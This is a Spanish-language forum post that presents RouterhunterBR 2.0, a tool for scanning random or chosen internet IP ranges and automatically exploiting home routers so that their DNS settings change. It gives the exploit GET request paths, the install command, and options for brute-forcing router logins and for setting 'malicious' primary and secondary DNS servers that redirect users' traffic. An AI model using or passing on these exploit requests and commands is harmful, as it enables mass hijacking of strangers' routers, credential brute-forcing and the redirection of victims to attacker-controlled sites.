24 de Abril de 2017, 04:27:44 am
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Scanner Routerhunter 2.0  (Leído 1137 veces)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.075
  • Reputación: +244/-0
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Scanner Routerhunter 2.0
« en: 04 de Febrero de 2016, 08:39:06 pm »

El RouterhunterBR es una herramienta de seguridad automatizada. Que encuentra vulnerabilidades y realiza pruebas en los routers y dispositivos vulnerables en Internet. El RouterhunterBR fue diseñado para funcionar a través de Internet en busca de pistas ips definidos o al azar con el fin de explotar la vulnerabilidad de forma automática DNSChanger en routers domésticos.

El DNSChanger es un troyano capaz de dirigir las peticiones del usuario a ilegales sitios. En la práctica , este programa malicioso capacidad de cambiar la configuración de DNS de nuestra máquina de redirigir al usuario a sitios con fines maliciosos . Imagínese , por ejemplo, que su sistema está infectado con este malware , lo que podría ocurrir es que el usuario para acceder a un determinado sitio (por ejemplo . Facebook.com ) puede ser remitido a una oferta no solicitada sitio web y potencialmente ilegal.

AUTOR: Jhonathan Davi A.K.A jh00nbr
EMAIL*: jhoonbr@protonmail.ch
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/jh00nbr
Facebook: https://fb.com/JhonVipNet
Fanpage: https://fb.com/InurlBrasil
Github: https://github.com/jh00nbr/
Youtube: http://www.youtube.com/c/Mrsinisterboy

GETs:
Código: [Seleccionar]
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1″

/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsIfcsList=&dnsRefresh=1″

/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=”

/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1″

/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4

/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP”

INSTALLATION:
Código: [Seleccionar]
git clone https://github.com/jh00nbr/Routerhunter-2.0.git

COMANDOS:
Código: [Seleccionar]
–range  201.12.50.0-255
Will set IP range that will be scanned

Código: [Seleccionar]
–bruteforce
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns.

Código: [Seleccionar]
 –startip / –endip
You can customize the IP range with a wildcard / Example: –startip 201.*.*.* –endip 201.*.*.*

Código: [Seleccionar]
–dns1 8.8.8.8 / –dns2 8.8.4.4
Server primary and secondary dns malicious, that anger is listening for requests and will perform the redirection of pages

Código: [Seleccionar]
–threads 10
Set threads numbers

Código: [Seleccionar]
–randomip
Randomizing ips routers

Código: [Seleccionar]
  –limitip 10
Define limite random ip

IMAGENES:




Más Info: https://jh00nsec.wordpress.com/2016/01/22/routerhunterbr-2-0-testing-vulnerabilities-in-devices-and-routers-connected-to-the-internet-dnschanger/
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD